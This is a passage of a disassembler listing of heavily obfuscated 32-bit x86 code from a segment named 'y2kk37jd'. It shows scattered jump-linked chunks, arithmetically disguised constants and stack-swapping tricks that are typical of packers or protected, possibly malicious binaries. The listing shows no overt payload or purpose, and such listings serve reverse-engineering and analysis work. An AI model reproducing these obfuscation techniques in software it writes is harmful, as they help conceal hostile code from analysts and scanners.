		xor	esi, ecx
		jmp	loc_43DC6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DE80

loc_459E5F:				; CODE XREF: sub_44DE80:loc_44DE8Ej
		pop	esi
		xor	edi, 0D2DB58E2h
		sub	edi, 0FCC33AD8h
		or	edi, 435149A0h
		rol	edi, 8
		add	edi, 0CACA5AAFh
		add	edi, ebp
		jmp	loc_453922
; END OF FUNCTION CHUNK	FOR sub_44DE80
; ---------------------------------------------------------------------------

loc_459E82:				; CODE XREF: y2kk37jd:0044FC60j
		jle	loc_43BAB0

; =============== S U B	R O U T	I N E =======================================



sub_459E88	proc near		; CODE XREF: y2kk37jd:0044331Cp

; FUNCTION CHUNK AT 0043BDDA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044AB63 SIZE 0000000C BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	0D5D2A0CCh
		pop	ecx
		rol	ecx, 0Ch
		jmp	loc_44AB63
sub_459E88	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_175. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444DF4

loc_459E9B:				; CODE XREF: sub_444DF4-286Cj
		jmp	loc_43BBEF
; END OF FUNCTION CHUNK	FOR sub_444DF4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_459EA0:				; CODE XREF: sub_448700-A4BBj
		jmp	sub_45C5C5
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_459EA5:				; CODE XREF: sub_4477A2:loc_43D1E7j
					; y2kk37jd:0043D1FFj
		sub	edi, 5578716Fh
		jnb	loc_447BB3
; END OF FUNCTION CHUNK	FOR sub_4477A2
; START	OF FUNCTION CHUNK FOR sub_444899

loc_459EB1:				; CODE XREF: sub_444899+A9D4j
		jmp	sub_459A7D
; END OF FUNCTION CHUNK	FOR sub_444899
; ---------------------------------------------------------------------------

loc_459EB6:				; CODE XREF: y2kk37jd:0044818Dj
		jmp	loc_446D33
; ---------------------------------------------------------------------------

loc_459EBB:				; CODE XREF: y2kk37jd:00446566j
		shr	eax, 19h
		jmp	loc_447BAE

; =============== S U B	R O U T	I N E =======================================



sub_459EC3	proc near		; CODE XREF: y2kk37jd:0043E384j
					; sub_4490B4+135F4p

; FUNCTION CHUNK AT 0043D12C SIZE 00000018 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		pushf

loc_459EC8:				; CODE XREF: y2kk37jd:0044E7D5j
		push	55FC2E61h
		pop	esi
		sub	esi, 3C5D61A6h
		and	esi, 0B0750E6Ah
		jmp	loc_43D12C
sub_459EC3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_459EDF:				; CODE XREF: sub_4440AB:loc_43DB8Fj
		jnz	loc_456FDA
		jmp	loc_443BD3
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
		popf
		jmp	loc_455476
; ---------------------------------------------------------------------------
		push	0B55786EEh
		xchg	ebx, [esp]
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_459EF8:				; CODE XREF: sub_4507BF:loc_43C958j
		mov	edx, ebx
		pop	ebx
		xor	edx, 0DBB1BC50h
		jmp	loc_43E6C7
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4595D8

loc_459F06:				; CODE XREF: sub_4595D8-6FC8j
		jg	loc_43CA89

loc_459F0C:				; CODE XREF: sub_4595D8:loc_440D4Bj
		lea	eax, [ebp-12Dh]
		push	offset loc_442BB3
		jmp	loc_44CFB0
; END OF FUNCTION CHUNK	FOR sub_4595D8
; ---------------------------------------------------------------------------

loc_459F1C:				; CODE XREF: y2kk37jd:0045782Cj
		sub	ebx, 0D6F4D6F1h
		jmp	loc_442D54
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_459F27:				; CODE XREF: sub_456809+517Aj
		call	sub_44D0DC
		mov	eax, [ebp-30h]
		push	ecx
		push	3F2178EFh
		pop	ecx
		sub	ecx, 1AB4D31Fh
		jmp	loc_440BED
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BB55

loc_459F41:				; CODE XREF: sub_43BB55:loc_452C4Aj
		jge	loc_45B0C1

loc_459F47:				; CODE XREF: sub_4577FE-1B28Dj
		jmp	loc_447C14
; END OF FUNCTION CHUNK	FOR sub_43BB55
; ---------------------------------------------------------------------------
		cdq
		and	edx, 0E7D189B7h
		adc	edi, ecx
		jmp	loc_445CE3
; ---------------------------------------------------------------------------

loc_459F5A:				; CODE XREF: y2kk37jd:004478E2j
		mov	ecx, edx
		xchg	ecx, [esp]
		call	sub_4487FD
		push	4F66C83Dh
		jmp	loc_43E01A
; ---------------------------------------------------------------------------

loc_459F6E:				; CODE XREF: y2kk37jd:00448D09j
					; y2kk37jd:loc_458262j
		call	sub_45405E
		mov	edx, 9E849D81h
		call	sub_440CD1
		push	eax
		ror	eax, 16h
		jmp	loc_446B49
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_414. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44289F

loc_459F87:				; CODE XREF: sub_45ADEC-14A66j
					; sub_45ADEC-149F6j ...
		jmp	loc_44EB34
; ---------------------------------------------------------------------------

loc_459F8C:				; CODE XREF: sub_44289F+7j
					; sub_45ADEC-DCB0j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44289F

; =============== S U B	R O U T	I N E =======================================



sub_459F8F	proc near		; CODE XREF: sub_445226:loc_43F9F0j
					; sub_43F75D:loc_43FC92j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044824F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450626 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451038 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045139E SIZE 00000015 BYTES

		push	ebp
		jmp	loc_45139E
sub_459F8F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_459F95:				; CODE XREF: y2kk37jd:loc_4545A1j
		ror	edx, 16h

; =============== S U B	R O U T	I N E =======================================



sub_459F98	proc near		; CODE XREF: sub_443BAF+66DFp

arg_0		= dword	ptr  4

		xchg	edx, [esp+0]
		pop	edx
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_458EFC
sub_459F98	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F52

loc_459FA4:				; CODE XREF: sub_442F52:loc_442F69j
		jz	loc_455FC8

loc_459FAA:				; CODE XREF: sub_43FDE6+17B0Bj
		jmp	loc_43FA54
; END OF FUNCTION CHUNK	FOR sub_442F52
; ---------------------------------------------------------------------------

loc_459FAF:				; CODE XREF: y2kk37jd:00443225j
		and	esi, eax
		jmp	loc_455FC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_459FB6:				; CODE XREF: sub_445226-220Cj
					; sub_445226:loc_44525Dj
		movzx	eax, word ptr [ebp-6]
		mov	edx, [ebp-18h]
		push	esi
		push	68A60052h
		pop	esi
		and	esi, 114D77B5h
		cmp	esi, 6CEC7971h
		jmp	loc_44661C
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C01B

loc_459FD5:				; CODE XREF: sub_44C01B:loc_45C446j
		rol	edi, 0Fh
		xor	edi, 5948524h
		add	eax, edi
		pop	edi
		mov	edx, [eax]
		mov	al, 1
		call	edx
		xchg	ebx, [esp+0]
		jmp	loc_44775D
; END OF FUNCTION CHUNK	FOR sub_44C01B
; ---------------------------------------------------------------------------

loc_459FEF:				; CODE XREF: y2kk37jd:0044D22Aj
		call	sub_4526B7
; START	OF FUNCTION CHUNK FOR sub_44704D

loc_459FF4:				; CODE XREF: sub_44704D-BE82j
					; sub_44704D+3BFAj ...
		mov	eax, [ebp-0Ch]
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44704D
; ---------------------------------------------------------------------------

loc_459FFB:				; CODE XREF: y2kk37jd:00453C4Fj
		jmp	sub_4577FE
; ---------------------------------------------------------------------------

loc_45A000:				; CODE XREF: y2kk37jd:004429D8j
		jmp	loc_442415
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A40E

loc_45A005:				; CODE XREF: sub_45A40E:loc_45A41Aj
		push	edi
		push	0AF174EC9h
		call	sub_441C78

loc_45A010:				; CODE XREF: y2kk37jd:004581D7j
		jmp	nullsub_320
; END OF FUNCTION CHUNK	FOR sub_45A40E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45024B

loc_45A015:				; CODE XREF: sub_45024B+5CB7j
		jmp	loc_446A12
; END OF FUNCTION CHUNK	FOR sub_45024B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C01A

loc_45A01A:				; CODE XREF: sub_45C01A:loc_4424C5j
		jz	loc_4566BC
		sub	ebp, 3B2E6A11h
		mov	ebp, edi
		shr	edx, 8
		jmp	loc_4566BA
; END OF FUNCTION CHUNK	FOR sub_45C01A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D58E

loc_45A030:				; CODE XREF: sub_43D58E+16j
		call	sub_440CD1
		push	eax
		ror	eax, 1Ah
		mov	ds:dword_4470D0, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43D58E
; ---------------------------------------------------------------------------

loc_45A040:				; CODE XREF: y2kk37jd:004504B2j
		jmp	loc_446BE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D58E

loc_45A045:				; CODE XREF: sub_43D58E+6j
					; sub_4502C2-B3Dj
		rol	eax, 1Ah
		jmp	loc_455AC9
; END OF FUNCTION CHUNK	FOR sub_43D58E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_45A04D:				; CODE XREF: sub_445568:loc_455FC1j
		test	eax, eax
		jz	loc_458441
		jmp	loc_455F0C
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
		xor	eax, eax
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45A05D	proc near		; DATA XREF: sub_44C2AE+A0F2o

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0044F41A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00455178 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458C91 SIZE 00000014 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		push	0FFFFFFF1h
		jmp	loc_455178
sub_45A05D	endp

; ---------------------------------------------------------------------------
		mov	edx, ds:dword_450BC8

loc_45A06E:				; CODE XREF: y2kk37jd:loc_443E64j
		mov	ebx, [edx]
		sub	ebx, eax
		mov	ecx, [ebp-4]
; START	OF FUNCTION CHUNK FOR sub_43BAF2

loc_45A075:				; CODE XREF: sub_43BAF2:loc_449466j
		push	667542h
; END OF FUNCTION CHUNK	FOR sub_43BAF2
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_45A07A:				; CODE XREF: sub_44594E:loc_45A9B7j
		call	sub_448658
		mov	ebx, 2CC01FACh
		jmp	sub_44346B
; END OF FUNCTION CHUNK	FOR sub_44594E

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45A089	proc near		; DATA XREF: sub_44DC32:loc_4519BAo

; FUNCTION CHUNK AT 004593AD SIZE 00000005 BYTES

		mov	ebp, esp
		call	sub_4466E0

loc_45A090:				; CODE XREF: y2kk37jd:0044B727j
		jmp	loc_4593AD
sub_45A089	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_522. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_45A096:				; CODE XREF: sub_45689F+136Ej
		jmp	loc_43EC96
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CCE7

loc_45A09B:				; CODE XREF: sub_44CCE7+Fj
		jmp	loc_45AF14
; END OF FUNCTION CHUNK	FOR sub_44CCE7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_45A0A0:				; CODE XREF: sub_456809:loc_44659Ej
					; y2kk37jd:loc_44BC26j
		test	eax, eax
		jnz	loc_459B0A
		jmp	loc_43E855
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_45A0AD:				; CODE XREF: sub_4477A2+16DCj
		cmp	edi, 0A1CCDDBDh
		jmp	loc_4549BE
; END OF FUNCTION CHUNK	FOR sub_4477A2
; ---------------------------------------------------------------------------
		xchg	ecx, [ebx]
		jmp	loc_457A40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A87

loc_45A0BF:				; CODE XREF: sub_457A87+11j
		add	edx, 0F7D5B5EAh
		xor	edx, 431C9D51h
		call	sub_444180

loc_45A0D0:				; CODE XREF: y2kk37jd:004455BDj
		jmp	sub_45BBF8
; END OF FUNCTION CHUNK	FOR sub_457A87
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_45A0D5:				; CODE XREF: sub_43BA66:loc_43D7E6j
		push	9CF3FA7Bh
		pop	edi
		rol	edi, 12h
		xor	edi, 79396CDEh
		and	edi, 51145996h
		jmp	loc_43B68B
; END OF FUNCTION CHUNK	FOR sub_43BA66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_45A0EF:				; CODE XREF: sub_44107E:loc_448083j
		mov	esi, eax
		xchg	esi, [esp+4+var_4]
		call	sub_448C11
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_45471E
		jmp	loc_443DAC
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_45A108:				; CODE XREF: sub_4514DE+1B65j
		pop	esi

loc_45A109:				; CODE XREF: sub_4514DE:loc_45B024j
		lea	eax, [ebp-2AAh]
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44D915
		jmp	loc_43D613
; END OF FUNCTION CHUNK	FOR sub_4514DE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_325. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45A121:				; CODE XREF: y2kk37jd:loc_45A7D2j
		jnz	loc_444535
		jmp	loc_45C354
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_45A12C:				; CODE XREF: sub_454C24+3AC3j
					; y2kk37jd:0045BDC0j
		mov	ecx, eax

loc_45A12E:				; CODE XREF: sub_4468E0:loc_45BDA2j
		xor	ebx, 6B23EC65h
		test	ebx, 4000000h
		jmp	loc_43E638
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BBEA

loc_45A13F:				; CODE XREF: sub_44BBEA+Ej
		mov	eax, ebp
		pop	ebp
		and	eax, 2B373B07h
		push	offset loc_43D91B
		jmp	nullsub_312
; END OF FUNCTION CHUNK	FOR sub_44BBEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4473CD

loc_45A152:				; CODE XREF: sub_4473CD+Dj
		jnz	loc_447B0F
; END OF FUNCTION CHUNK	FOR sub_4473CD
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_45A158:				; CODE XREF: sub_43D41D+10CC8j
		jmp	loc_45AC36
; END OF FUNCTION CHUNK	FOR sub_43D41D
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_447B0C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_45A163:				; CODE XREF: sub_454539+21A1j
		mov	edx, ecx
		xchg	edx, [esp+0]
		mov	esp, ebp
		xchg	ebx, [esp+0]
		mov	ebp, ebx
		pop	ebx
		jmp	loc_441DC1
; END OF FUNCTION CHUNK	FOR sub_454539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45A175:				; CODE XREF: sub_445226:loc_44AD96j
		jz	loc_44FA3A
		jmp	loc_43F9E6
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EC8

loc_45A180:				; CODE XREF: sub_440EC8:loc_44F8CFj
		push	eax
		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp+14h+var_14]
		push	68A2C018h
		pop	ebx
		xor	ebx, 5419938Ch
		jmp	loc_446931
; END OF FUNCTION CHUNK	FOR sub_440EC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC0

loc_45A198:				; CODE XREF: sub_45AAC0+Cj
		push	eax
		push	0C1CEACC9h
		pop	eax
		and	eax, 0DC161A16h
; END OF FUNCTION CHUNK	FOR sub_45AAC0
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_45A1A5:				; CODE XREF: sub_44610D+1067Cj
		jnz	loc_452C78

loc_45A1AB:				; CODE XREF: y2kk37jd:0044214Bj
		and	esi, 0E6570A34h

loc_45A1B1:				; CODE XREF: sub_44CF38:loc_442128j
		or	eax, 4380D18h
		add	eax, 0FC0CB098h
		pushf
		jmp	loc_43EA81
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
		jmp	ds:off_41E0D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DD9

loc_45A1C9:				; CODE XREF: sub_458DD9-1B230j
		jmp	loc_454AE5
; END OF FUNCTION CHUNK	FOR sub_458DD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_45A1CE:				; CODE XREF: sub_4497DA:loc_44841Fj
					; sub_44CDD5-A9j ...
		jno	loc_43E583
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44EF0D

loc_45A1DE:				; CODE XREF: y2kk37jd:00442AEDj
		jmp	loc_4588B0
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45593D

loc_45A1E3:				; CODE XREF: sub_45593D-19C54j
		jmp	nullsub_314
; END OF FUNCTION CHUNK	FOR sub_45593D
; ---------------------------------------------------------------------------

loc_45A1E8:				; CODE XREF: y2kk37jd:0043B783j
		jmp	loc_45939D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44289F

loc_45A1ED:				; CODE XREF: sub_44289F+Dj
		jz	loc_459F87
		jmp	loc_4557B5
; END OF FUNCTION CHUNK	FOR sub_44289F
; ---------------------------------------------------------------------------
		mov	ds:dword_41E120, eax
		lea	eax, nullsub_500
		mov	byte ptr [eax],	0C3h
		jmp	loc_451177

; =============== S U B	R O U T	I N E =======================================



sub_45A20C	proc near		; CODE XREF: sub_40C8FC+191p
					; sub_45A20C+5j
					; DATA XREF: ...
		call	sub_444899
		jmp	ds:off_41E124
sub_45A20C	endp

; ---------------------------------------------------------------------------

loc_45A217:				; CODE XREF: y2kk37jd:00445055j
		jmp	loc_43D10F
; ---------------------------------------------------------------------------
		push	offset loc_44F873
		jmp	locret_443044
; ---------------------------------------------------------------------------
		popf
		jmp	loc_457040

; =============== S U B	R O U T	I N E =======================================



sub_45A22C	proc near		; CODE XREF: sub_41AB0C+27Bp
					; sub_41AB0C+2AFp ...

; FUNCTION CHUNK AT 0044D3BE SIZE 00000007 BYTES

		call	sub_447F82

loc_45A231:				; CODE XREF: sub_445226+9526j
		jmp	loc_44D3BE
sub_45A22C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E83

loc_45A236:				; CODE XREF: sub_444E83+13j
		jmp	loc_454E4C
; END OF FUNCTION CHUNK	FOR sub_444E83
; ---------------------------------------------------------------------------

loc_45A23B:				; CODE XREF: y2kk37jd:00453750j
		test	eax, ebx
		jmp	loc_45183D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448587

loc_45A242:				; CODE XREF: sub_448587j
		cmp	dword ptr [eax], 0FFFFFFFFh
		mov	ebx, [eax+4]
		mov	eax, [eax]
		call	sub_450D34

loc_45A24F:				; DATA XREF: sub_451682:loc_4413F2o
		mov	eax, [esp+0]
		push	edx
		push	0FE4127C1h
		pop	edx
		jmp	loc_445F32
; END OF FUNCTION CHUNK	FOR sub_448587
; ---------------------------------------------------------------------------
		shr	edx, 18h
		ror	edi, 1Ch
		jmp	sub_44472C
; ---------------------------------------------------------------------------

loc_45A269:				; CODE XREF: y2kk37jd:0043CD71j
		jnz	loc_4400C1
		jmp	loc_43B308
; ---------------------------------------------------------------------------

loc_45A274:				; CODE XREF: y2kk37jd:0044E0ACj
		xchg	ebx, [esp]
		mov	eax, ebx
		xchg	edi, [esp]
		mov	ebx, edi
		pop	edi
		pop	ecx
		pop	edx
		jmp	loc_456C0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_45A286:				; CODE XREF: sub_44610D-53E8j
		inc	dword ptr [ebp-8]
		cmp	dword ptr [ebp-8], 19h
		jnz	loc_440D14
		jmp	loc_450A59
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------

loc_45A298:				; CODE XREF: y2kk37jd:00451033j
		xchg	esi, [esp]
		push	6986FA97h
		pop	ebx
		add	ebx, 0C20F0345h
		jmp	loc_43CD09
; ---------------------------------------------------------------------------

loc_45A2AC:				; DATA XREF: sub_4411C3+19CD5o
		add	eax, 7A6967CEh
		mov	eax, [eax]
		push	edx
		push	9203A5CAh
		jmp	loc_43DF4B
; ---------------------------------------------------------------------------
		call	sub_45AC4B
		push	offset sub_442698
		jmp	locret_443E13
; ---------------------------------------------------------------------------

loc_45A2CE:				; CODE XREF: y2kk37jd:0044DFB1j
		call	sub_440FDF
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_45A2D3:				; CODE XREF: sub_44CF38-631j
		jmp	loc_45690D
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_45A2D8:				; CODE XREF: sub_451634:loc_43CABEj
		jz	loc_4423F5
		add	ecx, 1F9C4957h
		jmp	loc_45B1BC
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_45A2E9:				; CODE XREF: y2kk37jd:00444A70j
					; sub_442EB4:loc_45A6EFj
		push	offset loc_454885
		jmp	nullsub_329
; END OF FUNCTION CHUNK	FOR sub_442EB4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_149. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_45A2F4:				; CODE XREF: sub_44D302-1FA3j
		jmp	nullsub_318
; END OF FUNCTION CHUNK	FOR sub_44D302

; =============== S U B	R O U T	I N E =======================================



sub_45A2F9	proc near		; CODE XREF: sub_43B1D6+13EFp
					; sub_445226+1DCj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004422E6 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00443ED6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004505E6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045ACCE SIZE 00000011 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ebp, [esp-4+arg_0]
		push	0ABE61B52h
		pop	esi
		rol	esi, 12h
		sub	esi, 9BBCA8FFh
		xor	esi, 0F8194B2Eh
		jmp	loc_443ED6
sub_45A2F9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE8B

loc_45A31A:				; CODE XREF: sub_43DE8B:loc_45356Dj
					; sub_43DE8B+1816Bj
		push	offset loc_446E31
		jmp	nullsub_319
; END OF FUNCTION CHUNK	FOR sub_43DE8B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_45A324:				; CODE XREF: sub_456D3F:loc_44C65Aj
		jnz	loc_44A746
		jmp	loc_45B08A
; END OF FUNCTION CHUNK	FOR sub_456D3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD49

loc_45A32F:				; CODE XREF: sub_43BD49+1E8FBj
		mov	[esi], eax
		jo	loc_455FDC
		jmp	loc_446FC4
; END OF FUNCTION CHUNK	FOR sub_43BD49
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_395. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C01A

loc_45A33D:				; CODE XREF: sub_45C01A+6j
		jmp	loc_446849
; END OF FUNCTION CHUNK	FOR sub_45C01A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EA91

loc_45A342:				; CODE XREF: sub_44EA91+1j
		jmp	loc_44DB91
; END OF FUNCTION CHUNK	FOR sub_44EA91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_45A347:				; CODE XREF: sub_443AA7-30E5j
		sbb	esi, 584AE2A8h
		cdq

loc_45A34E:				; CODE XREF: sub_443AA7:loc_457AC6j
		push	eax
		lea	eax, dword_44F504
		push	ebp
		mov	ebp, eax
		push	offset loc_43FC2D
		jmp	loc_45C5B1
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------

loc_45A362:				; DATA XREF: sub_455E6A-F1B2o
		mov	eax, [ebp-4]
		mov	[ebp-8], eax
		mov	eax, [ebp+8]
		push	eax
		mov	eax, [ebp+8]
		test	byte ptr [eax-8], 8
		setnz	al
		call	sub_444EDE
; START	OF FUNCTION CHUNK FOR sub_45596A

loc_45A37B:				; CODE XREF: sub_45596A+6j
		jmp	loc_43E69F
; END OF FUNCTION CHUNK	FOR sub_45596A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B37E

loc_45A380:				; CODE XREF: sub_43B37E+4C66j
		jmp	loc_45BA68
; END OF FUNCTION CHUNK	FOR sub_43B37E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_45A385:				; CODE XREF: sub_4553C1:loc_4535C9j
		sub	ecx, edi
		jmp	sub_455677
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------

loc_45A38C:				; CODE XREF: y2kk37jd:00440CECj
		add	eax, 0B46E3EFDh
		xor	eax, 0BC7BAB10h
		add	eax, 44544D44h
		push	offset sub_44E2B5
		jmp	loc_45BEFA

; =============== S U B	R O U T	I N E =======================================



sub_45A3A8	proc near		; CODE XREF: sub_44866D:loc_457067j

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00446645 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004535F0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A81C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BAF0 SIZE 00000024 BYTES

		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp+4+var_4]
		push	eax
		pop	edi
		jmp	loc_45A81C
sub_45A3A8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451C7D

loc_45A3B5:				; CODE XREF: sub_451C7D:loc_448339j
		jnz	loc_44C7F9
		jmp	loc_4520A7
; END OF FUNCTION CHUNK	FOR sub_451C7D
; ---------------------------------------------------------------------------
		push	2356B18Ah
		jmp	sub_4468BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_45A3CA:				; CODE XREF: sub_43C7B9:loc_44C160j
		rol	eax, 13h
		call	sub_45547C
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; START	OF FUNCTION CHUNK FOR sub_44B55D

loc_45A3D2:				; CODE XREF: sub_44B55D:loc_456313j
		jnz	loc_4550FA
		jmp	loc_440C7F
; END OF FUNCTION CHUNK	FOR sub_44B55D
; ---------------------------------------------------------------------------

loc_45A3DD:				; CODE XREF: y2kk37jd:004522D6j
		jg	loc_443166
		add	edx, 0A4885BCEh
		push	4436CF4h
		jmp	loc_45777F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45A3F3:				; CODE XREF: sub_445226-8263j
		test	ebp, 0CE4207ECh
		jmp	loc_44A1FB
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A011

loc_45A3FE:				; CODE XREF: sub_44A011:loc_4414AEj
		xor	edx, 0B2BD7812h
		push	offset sub_4509A0
		jmp	loc_4403B2
; END OF FUNCTION CHUNK	FOR sub_44A011

; =============== S U B	R O U T	I N E =======================================



sub_45A40E	proc near		; CODE XREF: sub_43BD0D:loc_456576p
					; y2kk37jd:00458603j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045A005 SIZE 00000010 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [esp+0]
		call	sub_44D39B

loc_45A41A:				; CODE XREF: sub_448088+Aj
